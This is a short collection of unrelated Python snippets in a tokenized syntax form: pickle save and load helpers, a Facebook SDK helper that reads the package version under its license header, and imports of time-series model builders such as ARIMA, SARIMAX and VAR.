<def_stmt>save_pickle path data<block_start><with_stmt>open(path "wb")<as>f<block_start>pickle.dump(data f)<block_end><block_end># load pickle <def_stmt>load_pickle path<block_start><with_stmt>open(path "rb")<as>f<block_start><return>pickle.load(f)<block_end><block_end>
# Copyright 2014 Facebook, Inc. # You are hereby granted a non-exclusive, worldwide, royalty-free license to # use, copy, modify, and distribute this software in source code or binary # form for use in connection with the web services and APIs provided by # Facebook. # As with any software that integrates with the Facebook platform, your use # of this software is subject to the Facebook Developer Principles and # Policies [http://developers.facebook.com/policy/]. This copyright notice # shall be included in all copies or substantial portions of the software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. """ Gets the current Facebook Python SDK version. """<import_stmt>os<import_stmt>re<def_stmt>get_version <block_start>this_dir=os.path.dirname(__file__)<line_sep>package_init_filename=os.path.join(this_dir '../__init__.py')<line_sep>version=<none><with_stmt>open(package_init_filename 'r')<as>handle<block_start>file_content=handle.read()<line_sep>version=re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]' file_content re.MULTILINE).group(1)<block_end><if_stmt><not>version<block_start><raise>ValueError('Cannot find version information')<block_end><return>version<block_end>
<import_from_stmt>.build_arima BuildArima<import_from_stmt>.build_sarimax BuildSarimax<import_from_stmt>.build_autoarimax BuildAutoSarimax<import_from_stmt>.build_var BuildVAR<line_sep>